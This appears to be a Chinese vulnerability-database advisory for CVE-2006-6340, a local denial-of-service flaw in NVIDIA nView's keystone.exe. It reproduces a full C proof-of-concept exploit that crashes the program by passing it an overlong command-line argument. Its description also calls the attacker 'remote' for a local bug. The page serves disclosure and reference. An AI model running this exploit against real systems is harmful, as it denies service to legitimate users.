Nvidia NView 'Keystone.EXE'本地拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111643 漏洞类型 边界条件错误
发布时间 2006-11-23 更新时间 2006-12-08
CVE编号 CVE-2006-6340 CNNVD-ID CNNVD-200612-087
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/29170
https://cxsecurity.com/issue/WLB-2006120045
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-087
|漏洞详情
nVIDIAnView中的keystone.exe存在本地拒绝服务漏洞。远程攻击者通过长的命令行自变量来发起拒绝服务攻击。注:还不清楚此问题是否跨越安全界限。如果不是这样,则此问题不是漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/21260/info

NVIDIA nView is prone to a local denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.

/*
NVIDIA nView (keystone) local Denial Of service
(c)oded By Hessam-x / www.Hessamx.net
*/

#include <stdio.h>
#include <string.h>
#include <windows.h>
int main()
{


char junk[] = "a";
char box[650];

 char *buf;

 int i;
        printf("-:: NVIDIA nView (keystone) Denial Of service \n");
        printf("-:: Coded By Hessam-x / www.hessamx.net \n");
    strcpy(box,"a");
        for (i = 0; i < 600; i++) {
          strcat(box,junk);
        }
         buf = (char *) malloc(650);


strcpy (buf,"keystone\t");
strcat (buf,box);
buf[650-1]='\0';

WinExec(buf,0);
free(buf);
}
|参考资料

来源:BUGTRAQ
名称:20061123NVIDIAnView(keystone)localDenialOfservice
链接:http://www.securityfocus.com/archive/1/archive/1/452439/100/100/threaded
来源:BID
名称:21260
链接:http://www.securityfocus.com/bid/21260
来源:SREASON
名称:1973
链接:http://securityreason.com/securityalert/1973